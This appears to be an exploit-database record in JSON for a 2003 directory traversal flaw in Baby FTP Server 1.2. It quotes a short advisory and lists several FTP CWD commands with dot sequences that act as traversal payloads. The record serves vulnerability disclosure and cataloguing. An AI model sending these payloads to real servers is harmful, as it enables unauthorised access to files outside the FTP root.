Description
pablo software Solutions baby ftp server 1.2 - Directory Traversal
{"lastseen": "2020-04-01T19:06:02", "references": [], "description": "\npablo software Solutions baby ftp server 1.2 - Directory Traversal", "edition": 1, "reporter": "dr_insane", "exploitpack": {"type": "remote", "platform": "windows"}, "published": "2003-05-29T00:00:00", "title": "pablo software Solutions baby ftp server 1.2 - Directory Traversal", "type": "exploitpack", "enchantments": {"dependencies": {}, "score": {"value": 0.8, "vector": "NONE"}, "backreferences": {}, "exploitation": null, "vulnersScore": 0.8}, "bulletinFamily": "exploit", "cvelist": [], "modified": "2003-05-29T00:00:00", "id": "EXPLOITPACK:98315B0F80CBC2BCC62BC7AB4538512F", "href": "", "viewCount": 3, "sourceData": "source: https://www.securityfocus.com/bid/7749/info\n\nIt has been reported that Baby FTP Server does not properly handle some types of requests. This may make it possible for a remote user to gain access to resources outside of the FTP root directory. \n\nCWD ...\nCWD /...\nCWD /......\nCWD \\...\nCWD ...CWD .../", "cvss": {"score": 0.0, "vector": "NONE"}, "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1645821498, "score": 1659818015}, "_internal": {"score_hash": "62abf277670df10c22db231a72ad04d8"}}
{}